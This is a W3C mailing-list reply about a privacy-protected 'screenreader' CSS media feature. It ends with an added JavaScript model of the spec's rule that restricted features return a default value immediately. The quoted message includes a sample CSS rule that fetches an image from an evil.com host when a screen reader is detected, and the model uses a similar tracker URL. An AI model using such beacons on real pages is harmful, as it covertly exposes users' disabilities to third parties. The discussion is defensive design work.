Re: [css-speech][css-content][mediaqueries] Making Generated Content Accessible

> On Dec 2, 2014, at 1:46 PM, Florian Rivoal <florian@rivoal.net> wrote:
> 
>> It'd be problematic to offer an unprotected "(screenreader)" media feature because it would offer any web page the ability to detect with a high degree of certainty that a visitor has a particular physical disability. In my opinion, it would be a privacy and personal security nightmare to implement *unless* CSS were to implement a media feature privacy model similar to the one defined in IndieUI User Context.
> 
> I agree that a privacy protecting model is worth having for something like this. However, unless I am missing something, the privacy model you propose doesn’t provide adequate protection. What prevents authors from doing this:
> 
> <style>
> @media (screenreader) { #snoop { background: url(http://www.evil.com/info-leak.gif); } }
> </style>
> <div id="snoop"></div>

That wouldn't ever load the image until after the user had approved access. It would also not be subject to a timing attack because the prompt would not block.

From the spec:

To avoid privacy concerns, User Agents MUST immediately return the default value for any restricted features that will result in a user prompt. If and when the user chooses to share settings from the relevant category with the requesting page, the web page author can handle a user setting change callback, or make a subsequent request to the userSetting() method of the Window object.

http://rawgit.com/w3c/indie-ui/master/src/indie-ui-context.html#RequirementsForUserSetting

Received on Tuesday, 2 December 2014 21:59:16 UTC
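
A small model of the rule quoted from the spec above, added here as an example; it is not part of the original message, the IndieUI spec, or any browser's API. The class and function names and the tracker.example URL are hypothetical. It shows that an unapproved page gets the same result whether or not the user runs a screen reader, and that the read never waits on the prompt.

```javascript
// Constructed model of "return the default value immediately" for a
// restricted feature. All names here are hypothetical.
class RestrictedFeatureGate {
  constructor(actualValue, defaultValue) {
    this.actual = actualValue;     // the user's real setting
    this.fallback = defaultValue;  // what every unapproved page sees
    this.approved = false;
    this.promptPending = false;
    this.listeners = [];
  }
  // Synchronous read: the prompt is queued, never awaited, so the time
  // taken does not depend on whether a prompt was raised or answered.
  read() {
    if (this.approved) return this.actual;
    this.promptPending = true;
    return this.fallback;
  }
  onChange(fn) { this.listeners.push(fn); }
  // Called by the user agent when the user answers the prompt.
  resolvePrompt(allow) {
    if (!this.promptPending) return;
    this.promptPending = false;
    if (!allow) return;
    this.approved = true;
    if (this.actual !== this.fallback) {
      this.listeners.forEach((fn) => fn(this.actual));
    }
  }
}

// Which url() fetches a stylesheet like the quoted one would cause.
function fetchesFor(gate, rules) {
  const matched = gate.read();
  return rules.filter((r) => r.whenFeature === matched).map((r) => r.url);
}

function simulate(userHasScreenReader, userAllows) {
  const gate = new RestrictedFeatureGate(userHasScreenReader, false);
  // Constructed rule standing in for "@media (screenreader) { ... url(...) }".
  const rules = [{ whenFeature: true, url: "https://tracker.example/leak.gif" }];
  const log = { before: fetchesFor(gate, rules), callbackFired: false };
  gate.onChange(() => { log.callbackFired = true; });
  gate.resolvePrompt(userAllows);
  log.after = fetchesFor(gate, rules);
  return log;
}
```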